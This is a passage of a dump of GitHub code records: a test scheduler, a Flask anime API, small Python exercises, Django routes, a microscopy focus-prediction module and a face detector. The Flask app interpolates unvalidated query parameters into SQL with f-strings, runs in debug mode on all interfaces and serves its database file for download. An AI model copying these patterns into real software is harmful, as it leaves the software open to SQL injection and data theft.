'status': 'success'})\n logger.info('submitting report with %s item(s)', len(report.items))\n await self.report_queue.put(report)\n\n async def stop(self):\n await self.report_queue.join()\n self.task.cancel()\n with suppress(asyncio.CancelledError):\n await self.task\n\n async def on_server_message(self, message_type, payload):\n if message_type == MessageType.Config.value:\n config_data = self.serializer.serialize_config(self.settings, self.worker_id)\n logger.info('generated config: %s', config_data)\n await self.client.send(MessageType.Config, config_data)\n elif message_type == MessageType.Suite.value:\n suite_data = self.serializer.serialize_suite(self.suite_items)\n logger.info('initialising suite with %s item(s)', len(self.suite_items))\n await self.client.send(MessageType.Suite, suite_data)\n elif message_type == MessageType.Schedules.value:\n for schedule_data in payload:\n schedule = self.serializer.deserialize_schedule(schedule_data)\n logger.info('received schedule with %s item(s)', len(schedule.items))\n await self.schedule_queue.put(schedule)\n elif message_type == MessageType.Done.value:\n self.more = False\n await self.schedule_queue.put(None) # so we unblock 'next'\n elif message_type == MessageType.Error.value:\n system_exit(payload['title'], payload['body'], payload['meta'])\n\n async def 
_report_task(self):\n logger.info('initialising report task')\n while True:\n try:\n report = await self.report_queue.get()\n logger.info('sending %s completed item(s)', len(report.items))\n report_data = self.serializer.serialize_report(report)\n await self.client.send(MessageType.Report, report_data)\n self.report_queue.task_done()\n except asyncio.CancelledError:\n break\n\n @property\n def done(self):\n return self.schedule_queue.empty() and not self.more\n","repo_name":"bungeebyte/pytest-conquer","sub_path":"testandconquer/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"3058882801","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, render_template, jsonify, request, send_file\nfrom markupsafe import escape\nimport json\nimport requests\nimport mysql.connector\nimport random as rd\n\napp = Flask(\n __name__,\n static_url_path='',\n static_folder='static',\n template_folder='templates'\n)\n\n\nmydb = mysql.connector.connect(\n host=\"YOUR-HOST\",\n user=\"YOUR-USER\",\n passwd=\"YOUR-PASSWORD\",\n database=\"YOUR-DATABASE\"\n)\n\n\ndef animeRequestSQLAll(id):\n mycursor = mydb.cursor()\n mycursor.execute(f\"\"\"\n SELECT \n\tAnime.id_anime,\n\tAnime.nom_anime,\n\tAnime.url_img_anime,\n\tAnime.nbepisode_anime,\n\tAnime.vue_anime,\n\tAnime.desc_anime,\n\tFormat.nom_format,\n\tStatue.state_statue,\n alternative_titles_en_anime,\n alternative_titles_ja_anime,\n alternative_titles_synonyms_anime\n FROM \n\tAnime, \n\tFormat,\n\tStatue\n WHERE \n\tAnime.format_id_format = Format.id_format and\n\tAnime.statue_id_statue = Statue.id_statue and \n Anime.id_anime = {id}\n \"\"\")\n return mycursor.fetchall()\n\n\ndef animeRequestSQL(offset, limit):\n mycursor = mydb.cursor()\n mycursor.execute(f\"\"\"\n SELECT \n\tAnime.id_anime,\n Anime.nom_anime,\n Anime.url_img_anime,\n\tAnime.nbepisode_anime,\n Anime.vue_anime,\n Anime.desc_anime, \n Format.nom_format \n FROM \n\tAnime, \n Format \n WHERE \n\t Anime.format_id_format = Format.id_format\n ORDER BY \n\t Anime.id_anime\n LIMIT {limit} \n OFFSET {offset};\n \"\"\")\n return mycursor.fetchall()\n\n\ndef animeRequestSQLSearch():\n mycursor = mydb.cursor()\n mycursor.execute(f\"\"\"\n SELECT \n\tAnime.id_anime,\n Anime.nom_anime,\n Anime.url_img_anime,\n\tAnime.nbepisode_anime,\n Anime.vue_anime,\n Anime.desc_anime, \n Format.nom_format \n FROM \n\tAnime, \n Format \n WHERE \n\t Anime.format_id_format = Format.id_format\n ORDER BY \n\t Anime.id_anime;\n \"\"\")\n return mycursor.fetchall()\n\n\ndef DataFormat(v):\n return {\"id\": v[0], \"name\": v[1], \"img\": v[2],\n \"nbep\": v[3], \"vue\": v[4], \"desc\": v[5], \"type\": v[6]}\n\n\ndef DataFormatDetail(v):\n return {\"id\": v[0], \"name\": v[1], \"img\": v[2],\n \"nbep\": v[3], \"vue\": v[4], \"desc\": v[5], \"type\": v[6], \"statue\": v[7], \"en\": v[8], \"ja\": v[9], \"syn\": v[10].split(\";\")}\n\n\n@app.route('/api/anime', methods=['GET'])\ndef anime():\n id = request.args.get('id', default=rd.randint(0, 42000))\n try:\n id = int(id)\n data = animeRequestSQLAll(id)[0]\n data = DataFormatDetail(data)\n except Exception:\n data = None\n\n return jsonify({'status': '200', 'animes': data})\n\n\n@app.route('/api/page', methods=['GET'])\ndef page():\n offset = request.args.get('offset', default=0)\n limit = request.args.get('limit', default=1)\n data = animeRequestSQL(offset, limit)\n for k, v in enumerate(data):\n data[k] = DataFormat(v)\n 
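# note: offset/limit come straight from the query string and are interpolated into LIMIT/OFFSET\n return 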
jsonify({'status': '200', 'animes': data})\n\n\n@app.route('/api/search', methods=['GET'])\ndef search():\n title = request.args.get('title', default=None)\n if title != None:\n title = title.lower().split(' ')\n TMPdata = animeRequestSQLSearch()\n else:\n TMPdata = animeRequestSQL(rd.randint(0, 40000), 10)\n data = []\n for k, v in enumerate(TMPdata):\n continuer = True\n if title != None:\n for i in title:\n if i in v[1].lower():\n pass\n else:\n continuer = False\n if continuer:\n data.append(DataFormat(v))\n return jsonify({'status': '200', 'search': title, 'animes': data})\n\n\n@app.route('/return-files/')\ndef return_files_tut():\n try:\n return send_file('./data.db', attachment_filename='data.db')\n except Exception as e:\n return str(e)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"MaximCosta/API_Anime","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"91011180","text":"class Solution:\n def productExcludeItself(self,nums):\n answer = []\n _len = len(nums)\n prod = 1\n for i in range(_len):\n answer.append(prod)\n prod *= nums[i]\n prod = 1\n for i in range(_len - 1, -1, -1):\n answer[i] *= prod\n prod *= nums[i]\n return answer\n","repo_name":"marcus-aurelianus/Lintcode-with-Python","sub_path":"50. Product of Array Exclude Itself/sol50-fastest.py","file_name":"sol50-fastest.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"71766073659","text":"from ticket import Ticket\n\nclass Kassa:\n balance = 0\n tickets = []\n registered_source = []\n registered_destination = []\n registered_train = []\n trains = []\n\n def register_train(self, source, destination=None):\n self.registered_source = [source]\n self.registered_destination = [destination]\n self.registered_train += zip(self.registered_source, self.registered_destination)\n return self.registered_train\n\n def get_price(self, source, destination):\n return (len(source) + len(destination)) * 1000\n\n def buy_ticket(self, source, destination, person):\n for i in self.registered_train:\n if i[0] == source and i[1] == destination:\n price = self.get_price(source, destination)\n money = person.pay(price)\n if money:\n self.balance += money\n new_ticket = Ticket(source, destination, person.name, person.iin, person.age)\n self.tickets.append(new_ticket)\n print(\"Номер вашего билета -\", new_ticket.number)\n else:\n print(\"No money - no ticket!\")\n else:\n print(\"У нас нет такого поезда!\")\n break\n\n def get_ticket(self, iin, source, destination):\n for x in self.tickets:\n if x.source == source and x.destination == destination and x.passenger_iin == iin:\n return x\n\n def delete_ticket(self, ticket):\n self.tickets.remove(ticket)\n\n\nprint(\"Это касса!\", __name__)","repo_name":"yngkzk/python_homework","sub_path":"June 20/kassa.py","file_name":"kassa.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"19744958097","text":"\"\"\"soon_food_project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. 
Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('food/', views.food),\n path('df_btn/', views.df_btn_click),\n path('food/df_btn/', views.df_btn_click),\n path('random_choice/', views.random_cate),\n path('search_food/', views.search_food_btn),\n path('random_choice/select_detail/', views.detail_content),\n path('random_choice/select_detail/select_detail/', views.detail_content),\n path('search_food/select_detail/', views.detail_content),\n path('food/menu/', views.menu_lst),\n path('food/check_food/', views.check_food),\n path('random_choice/menu/', views.menu_lst),\n path('random_choice/select_detail/menu/', views.menu_lst),\n path('food/select_detail/', views.detail_content),\n path('search_food/menu/', views.menu_lst),\n # path('random_choice/select_food/', views.select_food),\n # path('random_choice/select_food_btn/', views.select_food),\n # path('/select_food_btn/', views.select_food),\n # path('random_choice/select_food_btn/chk_food/', views.final_check),\n # path('random_choice/select_food_btn/', views.final_check),\n # path('random_choice/select_food/', views.final_check),\n\n\n\n\n # path('random_choice/detail_contents1/', views.detail_content),\n # path('random_choice/check_food/', views.detail_content),\n # path('random_choice/detail_contents3/', views.detail_content)\n]\n","repo_name":"Shin-HyunSeung/soon_project","sub_path":"soon_food_project/soonfood_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"38616510699","text":"class Solution:\n \n def isComplete(self, row: int, coins: int) -> bool:\n \n needed_coins = (row * (row+1))//2\n return needed_coins <= coins\n \n \n # O(logn) time,\n # O(1) space,\n # Approach: binary search, math, \n def arrangeCoins(self, n: int) -> int:\n low, hi = 0, n\n ans = 0\n \n while low <= hi:\n mid = (low+hi)//2\n if self.isComplete(mid, n):\n ans = mid\n low = mid+1\n else:\n hi = mid-1\n \n return ans","repo_name":"destifo/Competitive-Programming","sub_path":"441. 
Arranging Coins/ArrangeCoins.py","file_name":"ArrangeCoins.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"23"} +{"seq_id":"15915350361","text":"import csv\nimport glob\nimport os\nimport time\n\n# from IPython.display import clear_output\nfrom pathlib import Path\n\n# from qtpy.QtCore import Qt\n# from qtpy.QtWidgets import QComboBox, QPushButton, QSlider\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.optimize import curve_fit\nfrom tifffile import imread, imwrite\nfrom tqdm import tqdm\n\nfrom oneat.NEATModels.neat_focus import NEATFocus\nfrom oneat.NEATModels.nets import Concat\nfrom oneat.NEATUtils.utils import (\n focyoloprediction,\n normalizeFloatZeroOne,\n simpleaveragenms,\n)\n\n# from napari.qt.threading import thread_worker\n# from matplotlib.backends.backend_qt5agg import \\\n# FigureCanvasQTAgg as FigureCanvas\nBoxname = \"ImageIDBox\"\nEventBoxname = \"EventIDBox\"\n\n\nclass NEATFocusPredict(NEATFocus):\n def __init__(self, config, model_dir, catconfig, cordconfig):\n\n super().__init__(\n config=config,\n model_dir=model_dir,\n catconfig=catconfig,\n cordconfig=cordconfig,\n )\n\n def predict(\n self,\n imagedir: str,\n Z_imagedir: str,\n Z_movie_name_list: list,\n Z_movie_input: list,\n start: int,\n fileextension: str = \"*TIF\",\n nb_prediction: int = 3,\n Z_n_tiles: tuple = (1, 2, 2),\n overlap_percent: float = 0.6,\n normalize: bool = True,\n ):\n\n self.imagedir = imagedir\n self.basedirResults = self.imagedir + \"/\" + \"live_results\"\n Path(self.basedirResults).mkdir(exist_ok=True)\n # Recurrsion variables\n self.Z_movie_name_list = Z_movie_name_list\n self.Z_movie_input = Z_movie_input\n self.Z_imagedir = Z_imagedir\n self.start = start\n self.nb_prediction = nb_prediction\n self.fileextension = fileextension\n self.Z_n_tiles = Z_n_tiles\n self.overlap_percent = overlap_percent\n self.normalize = normalize\n\n self.model = self._build()\n\n # Z slice folder listener\n while 1:\n\n Z_Raw_path = os.path.join(self.Z_imagedir, self.fileextension)\n Z_filesRaw = glob.glob(Z_Raw_path)\n\n for Z_movie_name in Z_filesRaw:\n Z_Name = os.path.basename(os.path.splitext(Z_movie_name)[0])\n # Check for unique filename\n if Z_Name not in self.Z_movie_name_list:\n self.Z_movie_name_list.append(Z_Name)\n self.Z_movie_input.append(Z_movie_name)\n\n if Z_Name in self.Z_movie_name_list:\n self.Z_movie_name_list.remove(Z_Name)\n if Z_movie_name in self.Z_movie_input:\n self.Z_movie_input.remove(Z_movie_name)\n\n self.Z_movie_input_list = []\n for (k, v) in self.Z_movie_input.items():\n self.Z_movie_input_list.append(v)\n total_movies = len(self.Z_movie_input_list)\n\n if total_movies > self.start:\n current_movies = imread(\n self.Z_movie_input_list[self.start : self.start + 1]\n )\n\n current_movies_down = current_movies\n # print(current_movies_down.shape)\n print(\n \"Predicting on Movie:\",\n self.Z_movie_input_list[self.start : self.start + 1],\n )\n\n eventboxes = []\n classedboxes = {}\n self.image = current_movies_down\n if self.normalize:\n self.image = normalizeFloatZeroOne(self.image, 1, 99.8)\n # Break image into tiles if neccessary\n\n print(\"Doing ONEAT prediction\")\n start_time = time.time()\n # Iterate over tiles\n\n for inputz in tqdm(range(0, self.image.shape[0])):\n if inputz <= self.image.shape[0] - self.imagez:\n\n eventboxes = []\n classedboxes = {}\n 
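# take a rolling window of imagez consecutive z-planes starting at inputz\n 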
smallimage = CreateVolume(\n self.image, self.imagez, inputz\n )\n predictions, allx, ally = self.predict_main(smallimage)\n for p in range(0, len(predictions)):\n\n sum_z_prediction = predictions[p]\n\n if sum_z_prediction is not None:\n # For each tile the prediction vector has shape N H W Categories + Training Vector labels\n for i in range(0, sum_z_prediction.shape[0]):\n z_prediction = sum_z_prediction[i]\n boxprediction = focyoloprediction(\n ally[p],\n allx[p],\n z_prediction,\n self.stride,\n inputz,\n self.config,\n self.key_categories,\n )\n\n if boxprediction is not None:\n eventboxes = eventboxes + boxprediction\n\n for (\n event_name,\n event_label,\n ) in self.key_categories.items():\n\n if event_label > 0:\n current_event_box = []\n for box in eventboxes:\n\n event_prob = box[event_name]\n if event_prob > 0:\n current_event_box.append(box)\n classedboxes[event_name] = [current_event_box]\n\n self.classedboxes = classedboxes\n self.eventboxes = eventboxes\n\n self.nms()\n self.to_csv()\n self.draw()\n\n print(\n \"____ Prediction took %s seconds ____ \",\n (time.time() - start_time),\n )\n self.print_planes()\n self.genmap()\n self.start = self.start + 1\n self.predict(\n self.imagedir,\n self.Z_imagedir,\n self.Z_movie_name_list,\n self.Z_movie_input,\n fileextension=self.fileextension,\n nb_prediction=self.nb_prediction,\n Z_n_tiles=self.Z_n_tiles,\n overlap_percent=self.overlap_percent,\n )\n\n def _build(self):\n\n Model = load_model(\n self.model_dir,\n custom_objects={\"loss\": self.yolo_loss, \"Concat\": Concat},\n )\n return Model\n\n def nms(self):\n\n best_iou_classedboxes = {}\n all_best_iou_classedboxes = {}\n self.all_iou_classedboxes = {}\n self.iou_classedboxes = {}\n for (event_name, event_label) in self.key_categories.items():\n if event_label > 0:\n # Get all events\n\n sorted_event_box = self.classedboxes[event_name][0]\n\n sorted_event_box = sorted(\n sorted_event_box, key=lambda x: x[event_name], reverse=True\n )\n\n scores = [\n sorted_event_box[i][event_name]\n for i in range(len(sorted_event_box))\n ]\n best_sorted_event_box, all_boxes = simpleaveragenms(\n sorted_event_box,\n scores,\n self.iou_threshold,\n self.event_threshold,\n event_name,\n )\n\n all_best_iou_classedboxes[event_name] = [all_boxes]\n best_iou_classedboxes[event_name] = [best_sorted_event_box]\n self.iou_classedboxes = best_iou_classedboxes\n self.all_iou_classedboxes = all_best_iou_classedboxes\n\n def genmap(self):\n\n image = imread(self.savename)\n Name = os.path.basename(os.path.splitext(self.savename)[0])\n Signal_first = image[:, :, :, 1]\n Signal_second = image[:, :, :, 2]\n Sum_signal_first = gaussian_filter(\n np.sum(Signal_first, axis=0), self.radius\n )\n Sum_signal_first = normalizeZeroOne(Sum_signal_first)\n Sum_signal_second = gaussian_filter(\n np.sum(Signal_second, axis=0), self.radius\n )\n\n Sum_signal_second = normalizeZeroOne(Sum_signal_second)\n\n Zmap = np.zeros(\n [Sum_signal_first.shape[0], Sum_signal_first.shape[1], 3]\n )\n Zmap[:, :, 0] = Sum_signal_first\n Zmap[:, :, 1] = Sum_signal_second\n Zmap[:, :, 2] = (Sum_signal_first + Sum_signal_second) / 2\n\n imwrite(self.basedirResults + Name + \"_Zmap\" + \".tif\", Zmap)\n\n def to_csv(self):\n\n for (event_name, event_label) in self.key_categories.items():\n\n if event_label > 0:\n zlocations = []\n scores = []\n max_scores = []\n iou_current_event_box = self.iou_classedboxes[event_name][0]\n zcenter = iou_current_event_box[\"real_z_event\"]\n max_score = iou_current_event_box[\"max_score\"]\n score = 
iou_current_event_box[event_name]\n\n zlocations.append(zcenter)\n scores.append(score)\n max_scores.append(max_score)\n print(zlocations, scores)\n event_count = np.column_stack([zlocations, scores, max_scores])\n event_count = sorted(\n event_count, key=lambda x: x[0], reverse=False\n )\n event_data = []\n csvname = (\n self.basedirResults + \"/\" + event_name + \"_FocusQuality\"\n )\n writer = csv.writer(open(csvname + \".csv\", \"a\"))\n filesize = os.stat(csvname + \".csv\").st_size\n if filesize < 1:\n writer.writerow([\"Z\", \"Score\", \"Max_score\"])\n for line in event_count:\n if line not in event_data:\n event_data.append(line)\n writer.writerows(event_data)\n event_data = []\n\n def fit_curve(self):\n\n for (event_name, event_label) in self.key_categories.items():\n\n if event_label > 0:\n readcsvname = (\n self.basedirResults + \"/\" + event_name + \"_FocusQuality\"\n )\n self.dataset = pd.read_csv(readcsvname + \".csv\", delimiter=\",\")\n self.dataset_index = self.dataset.index\n\n Z = self.dataset[self.dataset.keys()[0]][1:]\n score = self.dataset[self.dataset.keys()[1]][1:]\n\n H, A, mu0, sigma = gauss_fit(np.array(Z), np.array(score))\n csvname = (\n self.basedirResults\n + \"/\"\n + event_name\n + \"_GaussFitFocusQuality\"\n )\n writer = csv.writer(open(csvname + \".csv\", \"a\"))\n filesize = os.stat(csvname + \".csv\").st_size\n if filesize < 1:\n writer.writerow([\"Amplitude\", \"Mean\", \"Sigma\"])\n writer.writerow([A, mu0, sigma])\n\n csvname = self.basedirResults + \"/\" + event_name\n\n def print_planes(self):\n for (event_name, event_label) in self.key_categories.items():\n if event_label > 0:\n csvfname = (\n self.basedirResults\n + \"/\"\n + event_name\n + \"_FocusQuality\"\n + \".csv\"\n )\n dataset = pd.read_csv(csvfname, skiprows=0)\n z = dataset[dataset.keys()[0]][1:]\n score = dataset[dataset.keys()[1]][1:]\n maxz = z[np.argmax(score)] + 2\n print(\"Best Zs \" + \"for \" + event_name + \" at \" + str(maxz))\n\n def draw(self):\n\n for (event_name, event_label) in self.key_categories.items():\n\n if event_label > 0:\n\n xlocations = []\n ylocations = []\n scores = []\n zlocations = []\n heights = []\n widths = []\n iou_current_event_boxes = self.all_iou_classedboxes[\n event_name\n ][0]\n\n for iou_current_event_box in iou_current_event_boxes:\n\n xcenter = iou_current_event_box[\"xcenter\"]\n ycenter = iou_current_event_box[\"ycenter\"]\n zcenter = iou_current_event_box[\"real_z_event\"]\n xstart = iou_current_event_box[\"xstart\"]\n ystart = iou_current_event_box[\"ystart\"]\n xend = xstart + iou_current_event_box[\"width\"]\n yend = ystart + iou_current_event_box[\"height\"]\n score = iou_current_event_box[event_name]\n\n if event_label == 1:\n for x in range(int(xstart), int(xend)):\n for y in range(int(ystart), int(yend)):\n if (\n y < self.image.shape[1]\n and x < self.image.shape[2]\n ):\n self.Maskimage[int(zcenter), y, x, 1] = (\n self.Maskimage[int(zcenter), y, x, 1]\n + score\n )\n else:\n\n for x in range(int(xstart), int(xend)):\n for y in range(int(ystart), int(yend)):\n if (\n y < self.image.shape[1]\n and x < self.image.shape[2]\n ):\n self.Maskimage[int(zcenter), y, x, 2] = (\n self.Maskimage[int(zcenter), y, x, 2]\n + score\n )\n\n if score > 0.9:\n\n xlocations.append(round(xcenter))\n ylocations.append(round(ycenter))\n scores.append(score)\n zlocations.append(zcenter)\n heights.append(iou_current_event_box[\"height\"])\n widths.append(iou_current_event_box[\"width\"])\n\n def overlaptiles(self, sliceregion):\n\n if self.n_tiles == (1, 1):\n 
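# single-tile case: treat the whole frame as one patch\n patch = 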
[]\n rowout = []\n column = []\n patchx = sliceregion.shape[2] // self.n_tiles[0]\n patchy = sliceregion.shape[1] // self.n_tiles[1]\n patchshape = (patchy, patchx)\n smallpatch, smallrowout, smallcolumn = chunk_list(\n sliceregion, patchshape, self.stride, [0, 0]\n )\n patch.append(smallpatch)\n rowout.append(smallrowout)\n column.append(smallcolumn)\n\n else:\n patchx = sliceregion.shape[2] // self.n_tiles[0]\n patchy = sliceregion.shape[1] // self.n_tiles[1]\n\n if patchx > self.imagex and patchy > self.imagey:\n if self.overlap_percent > 1 or self.overlap_percent < 0:\n self.overlap_percent = 0.8\n\n jumpx = int(self.overlap_percent * patchx)\n jumpy = int(self.overlap_percent * patchy)\n\n patchshape = (patchy, patchx)\n rowstart = 0\n colstart = 0\n pairs = []\n # row is y, col is x\n\n while rowstart < sliceregion.shape[1] - patchy:\n colstart = 0\n while colstart < sliceregion.shape[2] - patchx:\n\n # Start iterating over the tile with jumps = stride of the fully convolutional network.\n pairs.append([rowstart, colstart])\n colstart += jumpx\n rowstart += jumpy\n\n # Include the last patch\n rowstart = sliceregion.shape[1] - patchy\n colstart = 0\n while colstart < sliceregion.shape[2]:\n pairs.append([rowstart, colstart])\n colstart += jumpx\n rowstart = 0\n colstart = sliceregion.shape[2] - patchx\n while rowstart < sliceregion.shape[1]:\n pairs.append([rowstart, colstart])\n rowstart += jumpy\n\n if (\n sliceregion.shape[1] >= self.imagey\n and sliceregion.shape[2] >= self.imagex\n ):\n\n patch = []\n rowout = []\n column = []\n for pair in pairs:\n smallpatch, smallrowout, smallcolumn = chunk_list(\n sliceregion, patchshape, self.stride, pair\n )\n if (\n smallpatch.shape[1] >= self.imagey\n and smallpatch.shape[2] >= self.imagex\n ):\n patch.append(smallpatch)\n rowout.append(smallrowout)\n column.append(smallcolumn)\n\n else:\n\n patch = []\n rowout = []\n column = []\n patchx = sliceregion.shape[2] // self.n_tiles[0]\n patchy = sliceregion.shape[1] // self.n_tiles[1]\n patchshape = (patchy, patchx)\n smallpatch, smallrowout, smallcolumn = chunk_list(\n sliceregion, patchshape, self.stride, [0, 0]\n )\n patch.append(smallpatch)\n rowout.append(smallrowout)\n column.append(smallcolumn)\n self.patch = patch\n self.sy = rowout\n self.sx = column\n\n def predict_main(self, sliceregion):\n try:\n self.overlaptiles(sliceregion)\n predictions = []\n allx = []\n ally = []\n if len(self.patch) > 0:\n for i in range(0, len(self.patch)):\n\n sum_time_prediction = self.make_patches(self.patch[i])\n predictions.append(sum_time_prediction)\n allx.append(self.sx[i])\n ally.append(self.sy[i])\n\n else:\n\n sum_time_prediction = self.make_patches(self.patch)\n predictions.append(sum_time_prediction)\n allx.append(self.sx)\n ally.append(self.sy)\n\n except tf.errors.ResourceExhaustedError:\n\n print(\"Out of memory, increasing overlapping tiles for prediction\")\n\n self.list_n_tiles = list(self.n_tiles)\n self.list_n_tiles[0] = self.n_tiles[0] + 1\n self.list_n_tiles[1] = self.n_tiles[1] + 1\n self.n_tiles = tuple(self.list_n_tiles)\n\n self.predict_main(sliceregion)\n\n return predictions, allx, ally\n\n def make_patches(self, sliceregion):\n\n predict_im = np.expand_dims(sliceregion, 0)\n\n prediction_vector = self.model.predict(\n np.expand_dims(predict_im, -1), verbose=0\n )\n\n return prediction_vector\n\n def make_batch_patches(self, sliceregion):\n\n prediction_vector = self.model.predict(\n np.expand_dims(sliceregion, -1), verbose=0\n )\n return prediction_vector\n\n\ndef 
chunk_list(image, patchshape, stride, pair):\n rowstart = pair[0]\n colstart = pair[1]\n\n endrow = rowstart + patchshape[0]\n endcol = colstart + patchshape[1]\n\n if endrow > image.shape[1]:\n endrow = image.shape[1]\n if endcol > image.shape[2]:\n endcol = image.shape[2]\n\n region = (\n slice(0, image.shape[0]),\n slice(rowstart, endrow),\n slice(colstart, endcol),\n )\n\n # The actual pixels in that region.\n patch = image[region]\n\n # Always normalize patch that goes into the netowrk for getting a prediction score\n\n return patch, rowstart, colstart\n\n\ndef CreateVolume(patch, imagez, timepoint):\n\n starttime = timepoint\n endtime = timepoint + imagez\n smallimg = patch[starttime:endtime, :]\n\n return smallimg\n\n\ndef normalizeZeroOne(x):\n x = x.astype(\"float32\")\n\n minVal = np.min(x)\n maxVal = np.max(x)\n\n x = (x - minVal) / (maxVal - minVal + 1.0e-20)\n\n return x\n\n\ndef gauss(x, H, A, x0, sigma):\n return H + A * np.exp(-((x - x0) ** 2) / (2 * sigma**2))\n\n\ndef gauss_fit(x, y):\n\n mean = sum(x * y) / sum(y)\n sigma = np.sqrt(sum(y * (x - mean) ** 2) / sum(y))\n popt, pcov = curve_fit(gauss, x, y, p0=[min(y), max(y), mean, sigma])\n return popt\n","repo_name":"Kapoorlabs-CAPED/caped-ai-oneat","sub_path":"src/oneat/NEATModels/neat_focus_microscope.py","file_name":"neat_focus_microscope.py","file_ext":"py","file_size_in_byte":21313,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"23"} +{"seq_id":"23779175313","text":"\n\nfrom keras.models import load_model\nimport numpy as np\nimport sys\nimport cv2\nimport os\nfrom keras import backend as K\nimport time\nfrom FaceChecker.FaceDetector.boundingbox import interpret_output_yolov2, crop\nfrom FaceChecker.FaceDetector.config import IMAGE_SIZE_THESHOLD\nos.environ['KERAS_BACKEND'] = 'tensorflow'\n\nclass FaceDetector:\n \n def __init__(self, model_path):\n self.detector = load_model(model_path)\n \n \"\"\"\n def detect_faces(self,frame):\n \n t = time.time()\n\n frame_resized = cv2.resize(frame, (416,416))/255.0\n \n frame_resized = np.expand_dims(frame_resized, axis=0)\n \n predict = self.detector.predict(frame_resized)[0]\n \n results = interpret_output_yolov2(predict, np.shape(frame)[1], np.shape(frame)[0])\n \n list_faces = []\n \n for i in range(len(results)):\n \n if results[i][5] >= 0.5 and results[i][0] == 'face':\n \n \n #display detected face\n x = int(results[i][1])\n y = int(results[i][2])\n w = int(results[i][3])//2\n h = int(results[i][4])//2\n \n xmin, xmax, ymin, ymax = crop(\n x, y, w, h, 1.4, np.shape(frame)[1], np.shape(frame)[0])\n \n print(str(i)+'-- '+str(xmin)+'-'+str(xmax)+'-'+str(ymin)+'-'+str(ymax))\n \n \n list_faces.append(frame[ymin:ymax, xmin:xmax])\n\n print('detect face time:{0:.4f}'.format(time.time()-t))\n\n return list_faces\n \n \"\"\"\n \n def detect_faces(self,frame):\n print(np.shape(frame))\n t = time.time()\n\n frame_resized = cv2.resize(frame, (416,416))/255.0\n\n frame_resized = np.expand_dims(frame_resized, axis=0)\n\n print(np.shape(frame_resized))\n\n predict = self.detector.predict(frame_resized)[0]\n\n results = interpret_output_yolov2(predict, np.shape(frame)[1], np.shape(frame)[0])\n\n list_faces = []\n\n print(len(results))\n\n for i in range(len(results)):\n\n if results[i][5] >= 0.7 and results[i][0] == 'face':\n \n info = {}\n\n #display detected face\n x = int(results[i][1])\n y = int(results[i][2])\n w = int(results[i][3])//2\n h = int(results[i][4])//2\n\n xmin, xmax, ymin, ymax = crop(\n x, y, w, h, 1.4, 
np.shape(frame)[1], np.shape(frame)[0])\n\n print(str(i)+'-- '+str(xmin)+'-'+str(xmax)+'-'+str(ymin)+'-'+str(ymax) )\n \n info['coordinates'] = [x,y,w,h]\n \n info['padding_face'] = frame[ymin:ymax, xmin:xmax]\n \n list_faces.append(info)\n\n print('detect face time:{0:.4f}'.format(time.time()-t))\n\n return list_faces\n \n def check_faces(self,list_faces):\n\n checked_faces = [face for face in list_faces if face['padding_face'].shape[0] >=IMAGE_SIZE_THESHOLD and face['padding_face'].shape[1] >=IMAGE_SIZE_THESHOLD]\n \n return checked_faces\n \n def test_on_video(self,video_path):\n \n cap = cv2.VideoCapture(video_path)\n \n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (int(cap.get(3)), int(cap.get(4))))\n \n while(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n \n list_faces = self.detect_faces(frame)\n \n result = self.check_faces(list_faces)\n \n if len(result) > 0:\n \n for info in result:\n x,y,w,h = info['coordinates']\n cv2.rectangle(frame,(x-w,y-h),(x+w,y+h),(0,0,255),4)\n out.write(frame)\n else:\n out.write(frame)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n \n \n \n\nif __name__=='__main__':\n \n face_detector = FaceDetector(model_path='/content/module2/FaceDetector/pretrain/yolov2_tiny-face.h5')\n \n video_path = '/content/module2/video.mp4'\n \n face_detector.test_on_video(video_path)\n \n\n \n ","repo_name":"dqhuy140598/PyFace","sub_path":"FaceChecker/FaceDetector/FaceDetector.py","file_name":"FaceDetector.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"2093880276","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\n\n# ==============================================================================\n# Computational Values\nITERATIONS = 2000\nEPS = 1e-5\n\n# ==============================================================================\n# Physical Values\n\nG = 3.0\nrho_s = 2500\nrho_f = 1000\nK_fl = 8.0\nK_sg = 10.0\nK_d = 4.0\nalpha = 0.6\nphi = 0.1\nk = 1.5\nmu_f = 1.0\nF = 1.0\nndim = 